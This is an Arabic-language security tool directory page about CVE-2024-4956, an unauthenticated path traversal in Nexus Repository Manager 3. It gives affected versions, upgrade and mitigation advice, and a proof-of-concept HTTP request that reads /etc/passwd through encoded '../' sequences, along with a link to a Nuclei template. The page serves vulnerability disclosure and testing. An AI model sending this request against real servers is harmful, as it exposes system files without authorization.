Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4956 — اجتياز المسار غير المصادق عليه في Nexus Repository 3 | Kitploit
أدوات/GitHubGitHub/erickfernandox/cve-2024-4956
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHuberickfernandox/cve-2024-4956

CVE-2024-4956

اجتياز المسار غير المصادق عليه في Nexus Repository 3

عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-4956 - اجتياز المسار غير المصادق عليه في Nexus Repository Manager 3

مدير مستودع Nexus هو مدير مستودع ينظم ويخزن ويوزع القطع الأثرية اللازمة للتطوير.

تم اكتشاف ثغرة اجتياز المسار في Nexus Repository 3، في الإصدارات السابقة لـ 3.68.1. تسمح هذه الثغرة للمهاجم بصياغة عنوان URL لتنزيل ملفات النظام خارج نطاق تطبيق Nexus Repository، دون أي مصادقة. يشكل هذا خطرًا كبيرًا حيث يمكن أن يكشف ملفات النظام الحساسة وربما يعرض أمان البيئة التي تم تركيب Nexus Repository فيها للخطر.

يوصى بتحديث Nexus Repository إلى الإصدار 3.68.1 أو أحدث في أقرب وقت ممكن للتخفيف من هذه الثغرة.

لمزيد من المعلومات والتفاصيل التقنية حول الثغرة، يرجى الرجوع إلى الرابط التالي:

المراجع:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

الإصدارات المتأثرة

تؤثر الثغرة على الإصدارات من 3.0 إلى 3.68.0 من Sonatype Nexus Repository Manager.

التخفيف:

ترقية Nexus Repository هي الطريقة الموصى بها للقضاء على هذه الثغرة. ومع ذلك، تتوفر خيارات تخفيف فورية للنشر الذي لا يمكن الترقية فورًا:

المراجع:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

إثبات المفهوم (PoC)

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

مع إثبات المفهوم أعلاه، من الممكن رؤية ملف /etc/passwd يتم الوصول إليه:

قالب Nuclei

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

تنزيل الأداة